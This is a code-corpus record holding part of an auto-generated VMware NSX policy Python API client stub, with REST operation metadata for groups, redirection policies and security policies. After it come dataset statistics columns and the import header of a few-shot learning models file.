'domain_id': type.StringType(),
'group_id': type.StringType(),
'group': type.ReferenceType('com.vmware.nsx_policy.model_client', 'Group'),
})
patch_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
patch_input_value_validator_list = [
HasFieldsOfValidator()
]
patch_output_validator_list = [
]
patch_rest_metadata = OperationRestMetadata(
http_method='PATCH',
url_template='/policy/api/v1/infra/domains/{domain-id}/groups/{group-id}',
request_body_parameter='group',
path_variables={
'domain_id': 'domain-id',
'group_id': 'group-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for update operation
update_input_type = type.StructType('operation-input', {
'domain_id': type.StringType(),
'group_id': type.StringType(),
'group': type.ReferenceType('com.vmware.nsx_policy.model_client', 'Group'),
})
update_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
update_input_value_validator_list = [
HasFieldsOfValidator()
]
update_output_validator_list = [
HasFieldsOfValidator()
]
update_rest_metadata = OperationRestMetadata(
http_method='PUT',
url_template='/policy/api/v1/infra/domains/{domain-id}/groups/{group-id}',
request_body_parameter='group',
path_variables={
'domain_id': 'domain-id',
'group_id': 'group-id',
},
query_parameters={
},
content_type='application/json'
)
operations = {
'delete': {
'input_type': delete_input_type,
'output_type': type.VoidType(),
'errors': delete_error_dict,
'input_value_validator_list': delete_input_value_validator_list,
'output_validator_list': delete_output_validator_list,
'task_type': TaskType.NONE,
},
'get': {
'input_type': get_input_type,
'output_type': type.ReferenceType('com.vmware.nsx_policy.model_client', 'Group'),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
'list': {
'input_type': list_input_type,
'output_type': type.ReferenceType('com.vmware.nsx_policy.model_client', 'GroupListResult'),
'errors': list_error_dict,
'input_value_validator_list': list_input_value_validator_list,
'output_validator_list': list_output_validator_list,
'task_type': TaskType.NONE,
},
'patch': {
'input_type': patch_input_type,
'output_type': type.VoidType(),
'errors': patch_error_dict,
'input_value_validator_list': patch_input_value_validator_list,
'output_validator_list': patch_output_validator_list,
'task_type': TaskType.NONE,
},
'update': {
'input_type': update_input_type,
'output_type': type.ReferenceType('com.vmware.nsx_policy.model_client', 'Group'),
'errors': update_error_dict,
'input_value_validator_list': update_input_value_validator_list,
'output_validator_list': update_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'delete': delete_rest_metadata,
'get': get_rest_metadata,
'list': list_rest_metadata,
'patch': patch_rest_metadata,
'update': update_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx_policy.infra.domains.groups',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class _RedirectionPoliciesStub(ApiInterfaceStub):
def __init__(self, config):
# properties for delete operation
delete_input_type = type.StructType('operation-input', {
'domain_id': type.StringType(),
'redirection_policy_id': type.StringType(),
})
delete_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
delete_input_value_validator_list = [
]
delete_output_validator_list = [
]
delete_rest_metadata = OperationRestMetadata(
http_method='DELETE',
url_template='/policy/api/v1/infra/domains/{domain-id}/redirection-policies/{redirection-policy-id}',
path_variables={
'domain_id': 'domain-id',
'redirection_policy_id': 'redirection-policy-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for get operation
get_input_type = type.StructType('operation-input', {
'domain_id': type.StringType(),
'redirection_policy_id': type.StringType(),
})
get_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
HasFieldsOfValidator()
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/policy/api/v1/infra/domains/{domain-id}/redirection-policies/{redirection-policy-id}',
path_variables={
'domain_id': 'domain-id',
'redirection_policy_id': 'redirection-policy-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for list operation
list_input_type = type.StructType('operation-input', {
'cursor': type.OptionalType(type.StringType()),
'include_mark_for_delete_objects': type.OptionalType(type.BooleanType()),
'included_fields': type.OptionalType(type.StringType()),
'page_size': type.OptionalType(type.IntegerType()),
'sort_ascending': type.OptionalType(type.BooleanType()),
'sort_by': type.OptionalType(type.StringType()),
})
list_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
list_input_value_validator_list = [
]
list_output_validator_list = [
HasFieldsOfValidator()
]
list_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/policy/api/v1/infra/domains/redirection-policies',
path_variables={
},
query_parameters={
'cursor': 'cursor',
'include_mark_for_delete_objects': 'include_mark_for_delete_objects',
'included_fields': 'included_fields',
'page_size': 'page_size',
'sort_ascending': 'sort_ascending',
'sort_by': 'sort_by',
},
content_type='application/json'
)
# properties for list_0 operation
list_0_input_type = type.StructType('operation-input', {
'domain_id': type.StringType(),
'cursor': type.OptionalType(type.StringType()),
'include_mark_for_delete_objects': type.OptionalType(type.BooleanType()),
'included_fields': type.OptionalType(type.StringType()),
'page_size': type.OptionalType(type.IntegerType()),
'sort_ascending': type.OptionalType(type.BooleanType()),
'sort_by': type.OptionalType(type.StringType()),
})
list_0_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
list_0_input_value_validator_list = [
]
list_0_output_validator_list = [
HasFieldsOfValidator()
]
list_0_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/policy/api/v1/infra/domains/{domain-id}/redirection-policies',
path_variables={
'domain_id': 'domain-id',
},
query_parameters={
'cursor': 'cursor',
'include_mark_for_delete_objects': 'include_mark_for_delete_objects',
'included_fields': 'included_fields',
'page_size': 'page_size',
'sort_ascending': 'sort_ascending',
'sort_by': 'sort_by',
},
content_type='application/json'
)
# properties for patch operation
patch_input_type = type.StructType('operation-input', {
'domain_id': type.StringType(),
'redirection_policy_id': type.StringType(),
'redirection_policy': type.ReferenceType('com.vmware.nsx_policy.model_client', 'RedirectionPolicy'),
})
patch_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
patch_input_value_validator_list = [
HasFieldsOfValidator()
]
patch_output_validator_list = [
]
patch_rest_metadata = OperationRestMetadata(
http_method='PATCH',
url_template='/policy/api/v1/infra/domains/{domain-id}/redirection-policies/{redirection-policy-id}',
request_body_parameter='redirection_policy',
path_variables={
'domain_id': 'domain-id',
'redirection_policy_id': 'redirection-policy-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for update operation
update_input_type = type.StructType('operation-input', {
'domain_id': type.StringType(),
'redirection_policy_id': type.StringType(),
'redirection_policy': type.ReferenceType('com.vmware.nsx_policy.model_client', 'RedirectionPolicy'),
})
update_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
update_input_value_validator_list = [
HasFieldsOfValidator()
]
update_output_validator_list = [
HasFieldsOfValidator()
]
update_rest_metadata = OperationRestMetadata(
http_method='PUT',
url_template='/policy/api/v1/infra/domains/{domain-id}/redirection-policies/{redirection-policy-id}',
request_body_parameter='redirection_policy',
path_variables={
'domain_id': 'domain-id',
'redirection_policy_id': 'redirection-policy-id',
},
query_parameters={
},
content_type='application/json'
)
operations = {
'delete': {
'input_type': delete_input_type,
'output_type': type.VoidType(),
'errors': delete_error_dict,
'input_value_validator_list': delete_input_value_validator_list,
'output_validator_list': delete_output_validator_list,
'task_type': TaskType.NONE,
},
'get': {
'input_type': get_input_type,
'output_type': type.ReferenceType('com.vmware.nsx_policy.model_client', 'RedirectionPolicy'),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
'list': {
'input_type': list_input_type,
'output_type': type.ReferenceType('com.vmware.nsx_policy.model_client', 'RedirectionPolicyListResult'),
'errors': list_error_dict,
'input_value_validator_list': list_input_value_validator_list,
'output_validator_list': list_output_validator_list,
'task_type': TaskType.NONE,
},
'list_0': {
'input_type': list_0_input_type,
'output_type': type.ReferenceType('com.vmware.nsx_policy.model_client', 'RedirectionPolicyListResult'),
'errors': list_0_error_dict,
'input_value_validator_list': list_0_input_value_validator_list,
'output_validator_list': list_0_output_validator_list,
'task_type': TaskType.NONE,
},
'patch': {
'input_type': patch_input_type,
'output_type': type.VoidType(),
'errors': patch_error_dict,
'input_value_validator_list': patch_input_value_validator_list,
'output_validator_list': patch_output_validator_list,
'task_type': TaskType.NONE,
},
'update': {
'input_type': update_input_type,
'output_type': type.ReferenceType('com.vmware.nsx_policy.model_client', 'RedirectionPolicy'),
'errors': update_error_dict,
'input_value_validator_list': update_input_value_validator_list,
'output_validator_list': update_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'delete': delete_rest_metadata,
'get': get_rest_metadata,
'list': list_rest_metadata,
'list_0': list_0_rest_metadata,
'patch': patch_rest_metadata,
'update': update_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx_policy.infra.domains.redirection_policies',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class _SecurityPoliciesStub(ApiInterfaceStub):
def __init__(self, config):
# properties for delete operation
delete_input_type = type.StructType('operation-input', {
'domain_id': type.StringType(),
'security_policy_id': type.StringType(),
})
delete_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
delete_input_value_validator_list = [
]
delete_output_validator_list = [
]
delete_rest_metadata = OperationRestMetadata(
http_method='DELETE',
url_template='/policy/api/v1/infra/domains/{domain-id}/security-policies/{security-policy-id}',
path_variables={
'domain_id': 'domain-id',
'security_policy_id': 'security-policy-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for get operation
get_input_type = type.StructType('operation-input', {
'domain_id': type.StringType(),
'security_policy_id': type.StringType(),
})
get_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
HasFieldsOfValidator()
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/policy/api/v1/infra/domains/{domain-id}/security-policies/{security-policy-id}',
path_variables={
'domain_id': 'domain-id',
'security_policy_id': 'security-policy-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for list operation
list_input_type = type.StructType('operation-input', {
'domain_id': type.StringType(),
'cursor': type.OptionalType(type.StringType()),
'include_mark_for_delete_objects': type.OptionalType(type.BooleanType()),
'included_fields': type.OptionalType(type.StringType()),
'page_size': type.OptionalType(type.IntegerType()),
'sort_ascending': type.OptionalType(type.BooleanType()),
'sort_by': type.OptionalType(type.StringType()),
})
list_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
list_input_value_validator_list = [
]
list_output_validator_list = [
HasFieldsOfValidator()
]
list_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/policy/api/v1/infra/domains/{domain-id}/security-policies',
path_variables={
'domain_id': 'domain-id',
},
query_parameters={
'cursor': 'cursor',
'include_mark_for_delete_objects': 'include_mark_for_delete_objects',
'included_fields': 'included_fields',
'page_size': 'page_size',
'sort_ascending': 'sort_ascending',
'sort_by': 'sort_by',
},
content_type='application/json'
)
# properties for patch operation
patch_input_type = type.StructType('operation-input', {
'domain_id': type.StringType(),
'security_policy_id': type.StringType(),
'security_policy': type.ReferenceType('com.vmware.nsx_policy.model_client', 'SecurityPolicy'),
})
patch_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
patch_input_value_validator_list = [
HasFieldsOfValidator()
]
patch_output_validator_list = [
]
patch_rest_metadata = OperationRestMetadata(
http_method='PATCH',
url_template='/policy/api/v1/infra/domains/{domain-id}/security-policies/{security-policy-id}',
request_body_parameter='security_policy',
path_variables={
'domain_id': 'domain-id',
'security_policy_id': 'security-policy-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for revise operation
revise_input_type = type.StructType('operation-input', {
'domain_id': type.StringType(),
'security_policy_id': type.StringType(),
'security_policy': type.ReferenceType('com.vmware.nsx_policy.model_client', 'SecurityPolicy'),
'anchor_path': type.OptionalType(type.StringType()),
'operation': type.OptionalType(type.StringType()),
})
revise_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
revise_input_value_validator_list = [
HasFieldsOfValidator()
]
revise_output_validator_list = [
HasFieldsOfValidator()
]
revise_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/policy/api/v1/infra/domains/{domain-id}/security-policies/{security-policy-id}?action=revise',
request_body_parameter='security_policy',
path_variables={
'domain_id': 'domain-id',
'security_policy_id': 'security-policy-id',
},
query_parameters={
'anchor_path': 'anchor_path',
'operation': 'operation',
},
content_type='application/json'
)
# properties for update operation
update_input_type = type.StructType('operation-input', {
'domain_id': type.StringType(),
'security_policy_id': type.StringType(),
'security_policy': type.ReferenceType('com.vmware.nsx_policy.model_client', 'SecurityPolicy'),
})
update_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
update_input_value_validator_list = [
HasFieldsOfValidator()
]
update_output_validator_list = [
HasFieldsOfValidator()
]
update_rest_metadata = OperationRestMetadata(
http_method='PUT',
url_template='/policy/api/v1/infra/domains/{domain-id}/security-policies/{security-policy-id}',
request_body_parameter='security_policy',
path_variables={
'domain_id': 'domain-id',
'security_policy_id': 'security-policy-id',
},
query_parameters={
},
content_type='application/json'
)
operations = {
'delete': {
'input_type': delete_input_type,
'output_type': type.VoidType(),
'errors': delete_error_dict,
'input_value_validator_list': delete_input_value_validator_list,
'output_validator_list': delete_output_validator_list,
'task_type': TaskType.NONE,
},
'get': {
'input_type': get_input_type,
'output_type': type.ReferenceType('com.vmware.nsx_policy.model_client', 'SecurityPolicy'),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
'list': {
'input_type': list_input_type,
'output_type': type.ReferenceType('com.vmware.nsx_policy.model_client', 'SecurityPolicyListResult'),
'errors': list_error_dict,
'input_value_validator_list': list_input_value_validator_list,
'output_validator_list': list_output_validator_list,
'task_type': TaskType.NONE,
},
'patch': {
'input_type': patch_input_type,
'output_type': type.VoidType(),
'errors': patch_error_dict,
'input_value_validator_list': patch_input_value_validator_list,
'output_validator_list': patch_output_validator_list,
'task_type': TaskType.NONE,
},
'revise': {
'input_type': revise_input_type,
'output_type': type.ReferenceType('com.vmware.nsx_policy.model_client', 'SecurityPolicy'),
'errors': revise_error_dict,
'input_value_validator_list': revise_input_value_validator_list,
'output_validator_list': revise_output_validator_list,
'task_type': TaskType.NONE,
},
'update': {
'input_type': update_input_type,
'output_type': type.ReferenceType('com.vmware.nsx_policy.model_client', 'SecurityPolicy'),
'errors': update_error_dict,
'input_value_validator_list': update_input_value_validator_list,
'output_validator_list': update_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'delete': delete_rest_metadata,
'get': get_rest_metadata,
'list': list_rest_metadata,
'patch': patch_rest_metadata,
'revise': revise_rest_metadata,
'update': update_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx_policy.infra.domains.security_policies',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class StubFactory(StubFactoryBase):
_attrs = {
'CommunicationMaps': CommunicationMaps,
'GatewayPolicies': GatewayPolicies,
'Groups': Groups,
'RedirectionPolicies': RedirectionPolicies,
'SecurityPolicies': SecurityPolicies,
'communication_maps': 'com.vmware.nsx_policy.infra.domains.communication_maps_client.StubFactory',
'gateway_policies': 'com.vmware.nsx_policy.infra.domains.gateway_policies_client.StubFactory',
'groups': 'com.vmware.nsx_policy.infra.domains.groups_client.StubFactory',
'redirection_policies': 'com.vmware.nsx_policy.infra.domains.redirection_policies_client.StubFactory',
'security_policies': 'com.vmware.nsx_policy.infra.domains.security_policies_client.StubFactory',
}
| 44.917919
| 124
| 0.592025
| 12,094
| 122,581
| 5.750455
| 0.022987
| 0.069105
| 0.081313
| 0.100078
| 0.967762
| 0.965102
| 0.958761
| 0.95288
| 0.944353
| 0.940716
| 0
| 0.000851
| 0.300095
| 122,581
| 2,728
| 125
| 44.934384
| 0.809756
| 0.258401
| 0
| 0.813914
| 1
| 0.013009
| 0.324104
| 0.210648
| 0
| 0
| 0
| 0
| 0
| 1
| 0.022059
| false
| 0
| 0.006787
| 0
| 0.061652
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0fcb8e28808b35af9dd70b9dc4cc19dcbbc40172
| 145
|
py
|
Python
|
loldib/getratings/models/NA/na_taric/__init__.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_taric/__init__.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_taric/__init__.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
from .na_taric_top import *
from .na_taric_jng import *
from .na_taric_mid import *
from .na_taric_bot import *
from .na_taric_sup import *
| 24.166667
| 28
| 0.758621
| 25
| 145
| 4
| 0.36
| 0.3
| 0.55
| 0.68
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.172414
| 145
| 5
| 29
| 29
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
e88ca5160b9905fa6dc00392239a829d5dc0a264
| 1,439
|
py
|
Python
|
pyaz/sql/server/ad_only_auth/__init__.py
|
py-az-cli/py-az-cli
|
9a7dc44e360c096a5a2f15595353e9dad88a9792
|
[
"MIT"
] | null | null | null |
pyaz/sql/server/ad_only_auth/__init__.py
|
py-az-cli/py-az-cli
|
9a7dc44e360c096a5a2f15595353e9dad88a9792
|
[
"MIT"
] | null | null | null |
pyaz/sql/server/ad_only_auth/__init__.py
|
py-az-cli/py-az-cli
|
9a7dc44e360c096a5a2f15595353e9dad88a9792
|
[
"MIT"
] | 1
|
2022-02-03T09:12:01.000Z
|
2022-02-03T09:12:01.000Z
|
from .... pyaz_utils import _call_az
def disable(name, resource_group):
'''
Disable Azure Active Directly only Authentication for this Server.
Required Parameters:
- name -- Name of the Azure SQL server. You can configure the default using `az configure --defaults sql-server=<name>`
- resource_group -- Name of resource group. You can configure the default group using `az configure --defaults group=<name>`
'''
return _call_az("az sql server ad-only-auth disable", locals())
def enable(name, resource_group):
'''
Enable Azure Active Directly only Authentication for this Server.
Required Parameters:
- name -- Name of the Azure SQL server. You can configure the default using `az configure --defaults sql-server=<name>`
- resource_group -- Name of resource group. You can configure the default group using `az configure --defaults group=<name>`
'''
return _call_az("az sql server ad-only-auth enable", locals())
def get(name, resource_group):
'''
Get a specific Azure Active Directly only Authentication property.
Required Parameters:
- name -- Name of the Azure SQL server. You can configure the default using `az configure --defaults sql-server=<name>`
- resource_group -- Name of resource group. You can configure the default group using `az configure --defaults group=<name>`
'''
return _call_az("az sql server ad-only-auth get", locals())
| 41.114286
| 128
| 0.7123
| 198
| 1,439
| 5.10101
| 0.19697
| 0.115842
| 0.10099
| 0.106931
| 0.833663
| 0.79703
| 0.79703
| 0.79703
| 0.79703
| 0.79703
| 0
| 0
| 0.19319
| 1,439
| 34
| 129
| 42.323529
| 0.86994
| 0.694927
| 0
| 0
| 0
| 0
| 0.272472
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.428571
| false
| 0
| 0.142857
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
e8cee3fd645e9daeeefe3e537d892c0e0e3f825e
| 63,086
|
py
|
Python
|
src/models.py
|
microsoft/LiST
|
c8803e95593579c71c061d02e92c7d8501ba9e08
|
[
"MIT"
] | 21
|
2021-10-18T22:47:11.000Z
|
2022-03-14T17:06:31.000Z
|
src/models.py
|
microsoft/LiST
|
c8803e95593579c71c061d02e92c7d8501ba9e08
|
[
"MIT"
] | 6
|
2021-10-18T21:21:21.000Z
|
2022-03-11T18:28:03.000Z
|
src/models.py
|
microsoft/LiST
|
c8803e95593579c71c061d02e92c7d8501ba9e08
|
[
"MIT"
] | 4
|
2021-11-11T06:52:45.000Z
|
2022-03-11T17:25:45.000Z
|
"""Custom models for few-shot learning specific operations."""
import torch
import torch.nn as nn
import transformers
import torch.nn.functional as F
from transformers import AutoConfig, AutoModelForSequenceClassification, AutoTokenizer, EvalPrediction
from transformers.models.t5.modeling_t5 import T5ForConditionalGeneration
from transformers.models.bert.modeling_bert import BertPreTrainedModel, BertForSequenceClassification, BertModel, BertOnlyMLMHead
from transformers.models.roberta.modeling_roberta import RobertaForSequenceClassification, RobertaModel, RobertaLMHead, RobertaClassificationHead
from transformers.models.deberta_v2.modeling_deberta_v2 import DebertaV2PreTrainedModel, DebertaV2Model, StableDropout, ContextPooler, DebertaV2OnlyMLMHead
from transformers.models.deberta.modeling_deberta import DebertaPreTrainedModel, DebertaModel, StableDropout, ContextPooler, DebertaOnlyMLMHead
from transformers.modeling_outputs import SequenceClassifierOutput
from transformers.modeling_utils import PreTrainedModel
from loss import stable_kl, CeCriterion, KlCriterion, entropy, SymKlCriterion, ContrastiveLoss
from processors import processors_mapping, num_labels_mapping, output_modes_mapping, compute_metrics_mapping, bound_mapping
import logging
